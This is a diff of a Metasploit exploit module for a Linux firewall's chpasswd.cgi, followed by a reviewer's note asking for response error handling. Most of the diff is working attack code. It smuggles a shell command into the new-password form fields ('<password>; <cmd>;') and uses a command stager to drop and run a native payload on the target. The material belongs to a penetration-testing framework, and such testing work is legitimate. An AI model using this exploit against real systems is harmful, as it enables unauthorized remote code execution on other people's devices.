modules/exploits/linux/http/efw_chpasswd_exec.rb

```diff
@@ -0,0 +1,173 @@
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 10443
+        },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
+        '/cgi-bin/chpasswd.cgi']),
+      OptString.new('EFW_USERNAME', [true,
+        'Valid proxy account username for the target system']),
+      OptString.new('EFW_PASSWORD', [true,
+        'Valid password for the proxy user account']),
+      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
+      OptString.new('RPATH', [true,
+        'Target PATH for binaries used by the CmdStager', '/bin']),
+      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
+     ], self.class)
+  end
+
+  def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig,
+        "#{peer} - Failed to store payload inside executable, " +
+        "please select a native payload")
+    end
+
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'],
+      :nodelete => true)
+  end
+
+  def execute_command(cmd, opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+
+    req(cmd)
+  end
+
+  def req(cmd)
+    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
+
+    boundary = "----#{rand_text_alpha(34)}"
+    data = "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+    data << "change\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+    data << "#{datastore['EFW_USERNAME']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+    data << "#{datastore['EFW_PASSWORD']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+    data << "  Change password\r\n"
+    data << "--#{boundary}--\r\n"
+
+    refererUrl =
+      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
+      "#{datastore['TARGETURI']}"
+
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => datastore['TARGETURI'],
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'headers' => {
+          'Referer' => refererUrl
+        },
+        'data' => data
+      }, datastore['TIMEOUT'])
+
```

Comment:
In the current state, the module is not handling any errors such as no response received from the server, invalid username/password etc. You should do like:
```ruby
res = send_request_cgi
```
Then you have res.code and res.body to look for any errors. If everything works, you most probably will receive a res.code == 200 (Server OK) or res.code == 302 for redirection etc. Check for those and display an appropriate message to the user through print_good (successful), print_error (not successful) or print_status for any status message.